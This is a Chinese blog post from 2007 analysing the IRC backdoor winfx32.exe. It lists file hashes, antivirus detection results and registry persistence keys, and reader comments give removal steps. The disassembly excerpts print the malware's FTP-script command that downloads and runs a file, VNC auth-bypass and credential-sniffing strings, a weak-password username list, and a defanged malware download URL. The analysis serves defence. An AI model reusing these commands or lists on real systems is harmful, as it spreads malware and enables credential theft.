百度空间 | 百度首页 
 
查看文章
 
[原创]劣性病毒分析报告:winfx32.exe/winnt.bat
2007-05-28 22:52

样本来自;http://bbs.kafan.cn/viewthread.php?tid=90302&extra=page%3D2&page=1

病毒名称:winfx32.exe(PS:就叫做超声波吧)

病毒大小:448,512 字节

加壳方式:未知

病毒预警:4级

病毒指纹:

SHA-160                     : 697E2D59FA689ECEBFE7CB94AD0E56279B7735CD
MD5                         : 90ADC603C68C2330D229C73E403025A5
RIPEMD-160                  : 95CE00210ACB1878C3DA6764BB4EFAFC1F9ED36D
CRC-32                      : CB349415

文章作者: [G-AVR]孤单每一天

文章地址:http://hi.baidu.com/renlangliu/blog/item/d73ed9805484cbd69123d99a.html

命名对照:

http://scanner.virus.org

ArcaVir 1.0.4 Clean 2.67871 secs
avast! 3.0.0 Clean 0.00514603 secs
AVG Anti Virus 7.5.47 Clean 2.70932 secs
BitDefender 7.1 Backdoor.VB.EV 4.52359 secs
CAT QuickHeal 9.00 Clean 4.53888 secs
ClamAV 0.90/3311 Clean 0.531867 secs
Dr. Web 4.33.0 Clean 8.43897 secs
F-PROT 4.6.7 Clean 0.732941 secs
F-Secure 1.02 Backdoor.Win32.Rbot.cmy [AVP] 0.069514 secs
H+BEDV AntiVir 2.1.10-41 Clean 5.56607 secs
McAfee Virusscan 5.10.0 New Malware.bx 1.97413 secs
NOD32 2.51.1 Clean 2.93163 secs
Norman Virus Control 5.70.01 Clean 7.61458 secs
Panda 9.00.00 Clean 1.39275 secs
Sophos Sweep 4.17.0 Clean 5.45505 secs
Trend Micro 8.310-1002 Clean 0.020252 secs
VBA32 3.12.0 Clean 3.28923 secs
VirusBuster 1.3.3 Clean 2.03353 secs

http://www.virustotal.com

Antivirus Version Update Result
AhnLab-V3 2007.5.29.0 05.28.2007 no virus found
AntiVir 7.4.0.27 05.28.2007 no virus found
Authentium 4.93.8 05.23.2007 no virus found
Avast 4.7.997.0 05.28.2007 no virus found
AVG 7.5.0.467 05.28.2007 no virus found
BitDefender 7.2 05.28.2007 Backdoor.VB.EV
CAT-QuickHeal 9.00 05.28.2007 no virus found
ClamAV devel-20070416 05.28.2007 no virus found
DrWeb 4.33 05.28.2007 no virus found
eSafe 7.0.15.0 05.28.2007 Win32.Rbot.cmy
eTrust-Vet 30.7.3670 05.28.2007 no virus found
Ewido 4.0 05.28.2007 no virus found
FileAdvisor 1 05.28.2007 no virus found
Fortinet 2.85.0.0 05.28.2007 suspicious
F-Prot 4.3.2.48 05.25.2007 no virus found
F-Secure 6.70.13030.0 05.28.2007 no virus found
Ikarus T3.1.1.8 05.28.2007 Backdoor.VB.EV
Kaspersky 4.0.2.24 05.28.2007 Backdoor.Win32.Rbot.cmy
McAfee 5040 05.28.2007 New Malware.bx
Microsoft 1.2503 05.28.2007 no virus found
NOD32v2 2293 05.27.2007 no virus found
Norman 5.80.02 05.28.2007 no virus found
Panda 9.0.0.4 05.28.2007 no virus found

测试环境:winXPSP2 实机

病毒运行后拷贝自身到%systemroot%\system32\目录下,添加注册表启动项实现自启动,病毒运行中试图操作键盘。

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

名称:Windows Service Agent

类型:REG_SZ winfx32.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

连接:hxxp://alzahaby.com/vip/vrx6.exe下载其他病毒程序

病毒尝试用自身的端口扫描程序来扫描局域网端口,

使用net send命令发送恶意消息
接受命令发动DDOS攻击
使用FTP命令下载文件
___:00433EA8 s_VncD_DSS-Auth db 'VNC%d.%d %s: %s - [AuthBypass]',0
___:00433EA8                                                          ; DATA XREF: ___:0040EDF6 o
___:00433EC7                                  align 4
___:00433EC8 s_Rfb03d_03d                     db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: ___:0040EC83 o
___:00433ED7                                  align 4
___:00433ED8 word_433ED8                      dw 1                                     ; DATA XREF: ___:0040EBFA r
___:00433ED8                                                          ; sub_41B4FC+24 r
___:00433ED8                                                          ; ___:0041B656 r
___:00433EDA                                  align 4
___:00433EDC ; char s_Cmd_exe[]
___:00433EDC s_Cmd_exe                        db 'cmd.exe',0                           ; DATA XREF: ___:0040F01D o
___:00433EDC                                                          ; sub_41A153+21 o
___:00433EE4 s_EchoOpenSD>>O db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o &echo bye >>o &ftp -n -s'
___:00433EE4                                                          ; DATA XREF: ___:0040F317 o
___:00433EE4                                  db ':o &del /F /Q o &%s',0Dh,0Ah,0
___:00433F54 s_221GoodbyeHap db '221 Goodbye happy r00ting.',0Ah,0
___:00433F54                                                          ; DATA XREF: ___:0040F952 o
___:00433F70 s_425CanTOpenDa db '425 Can',27h,'t open data connection.',0Ah,0
PS:不知道为什么会有VNC,难道VNC又出了漏洞?
使用嗅探抓包原理来获取用户名和密码
___:00436EA8 s_IrcSniff                       db 'IRC sniff',0                         ; DATA XREF: sub_412FC2+5 o
___:00436EB2                                  align 4
___:00436EB4 s_Pass_0                         db 'PASS ',0                             ; DATA XREF: sub_413038+73 o
___:00436EBA                                  align 4
___:00436EBC s_User_2                         db 'USER ',0                             ; DATA XREF: sub_413038+62 o
___:00436EC2                                  align 4
___:00436ED4 s_FtpSniff                       db 'FTP sniff',0                         ; DATA XREF: sub_413038+5 o
___:00436F14 s_HttpSniff                      db 'HTTP sniff',0                        ; DATA XREF: sub_4130BF+5 o
___:00436F50 s_VulnSniff                      db 'VULN sniff',0                        ; DATA XREF: sub_413146+5 o
结束以下进程:
修改host文件(本机未实现)
尝试对NT4.0/2000SP1-SP4/XPSP0SP进行TFTP传播
对以下用户尝试若口令破解
___:00429898 s_Oracle                         db 'oracle',0
___:0042989F                                  align 10h
___:004298A0 s_Dba                            db 'dba',0
___:004298A4 s_Database                       db 'database',0
___:004298AD                                  align 10h
___:004298B0 s_Default                        db 'default',0
___:004298B8 s_Guest_0                        db 'guest',0
___:004298BE                                  align 10h
___:004298C0 s_Wwwadmin                       db 'wwwadmin',0
___:004298C9                                  align 4
___:004298CC s_Teacher                        db 'teacher',0
___:004298D4 s_Student                        db 'student',0
___:004298DC s_Owner                          db 'owner',0
___:004298E2                                  align 4
___:004298E4 s_Computer                       db 'computer',0
___:004298ED                                  align 10h
___:004298F0 s_Root                           db 'root',0
___:004298F5                                  align 4
___:004298F8 s_Staff                          db 'staff',0
___:004298FE                                  align 10h
___:00429900 s_Admin                          db 'admin',0
___:00429906                                  align 4
___:00429908 s_Admins                         db 'admins',0
___:0042990F                                  align 10h
___:00429910 s_Administrat                    db 'administrat',0
___:0042991C s_Administrateu db 'administrateur',0
___:0042992B                                  align 4
___:0042992C s_Administrador db 'administrador',0
___:0042993A                                  align 4
___:0042993C s_Administrat_0 db 'administrator',0
密码为a-z多个常用单词,系统名称、数字、年月
病毒利用众多漏洞传播
病毒运行后网速急速减慢,低配置计算机可能会出现死机现象,测试两分钟内开启线程将近150,截图:
PS:发现该病毒目前流传甚广,杀完又中,写了一个批处理专杀程序,对病毒进行了清除、免疫,欢迎下载使用。

类别:病毒岁月 | 浏览() | 评论 (10)
 
网友评论:
1
2007-05-29 07:46 | 回复
太疯狂了`` 哎,偶的IDA用不了```只能口水一下```
 
2
2007-05-29 16:43 | 回复
怎么样才可以把它删除阿。他是通过网络传播的。
 
3
2007-05-29 16:55 | 回复
清除很简单,只要结束进程删除文件就OK了,但是预防比较头痛…… 详情见置顶板块里面的《个人用户的计算机安全》一文 :http://hi.baidu.com/renlangliu/blog/item/0719362de0ea8635359bf766.html
 
4
2007-05-29 17:46 | 回复
删除早就可以删除了。就是防不住这个东西!!用的是诺顿的杀毒软件
 
5
2007-05-29 18:03 | 回复
RE:4 将如下注册表文件保存为reg文件双击导入注册表 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winfx32.exe] "debugger"="taskkill /f /im winfx32.exe"
 
6
2007-05-30 01:01 | 回复
"debugger"="taskkill /f /im winfx32.exe" debugger指向一个不存在的文件比较好,名字改得乱七八糟的就可以了; taskkill结束需要时间,有的病毒可能已经启动了另外一个进程进行守护了;
 
7
2007-05-30 10:22 | 回复
这个我测试过的,没事,那个免疫专杀也是加了这个命令
 
8
2007-05-30 10:40 | 回复
re:6 哈哈,进程互守可以用这种方法解决呀,先ifeo到taskkill上面一个,然后用它自己启动杀自己当然是针对那种同事启动的双进程而且互守的那种
 
9
2007-06-02 23:57 | 回复
我的系统是win2000,不是winxp,好象用这个杀不掉
 
10
2007-06-03 00:05 | 回复
RE:9 把如下文件保存为reg文件双击导入注册表 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winfx32.exe] "debugger"="taskkill /f /im winfx32.exe" 后删除注册表: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices 这几项里面的Windows Service Agent键值 在任务管理器里面结束winfx32.exe进程, 执行以下命令: attrib -s -h %systemroot%\system32\winfx32.exe del %systemroot%\system32\winfx32.exe /q /f
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu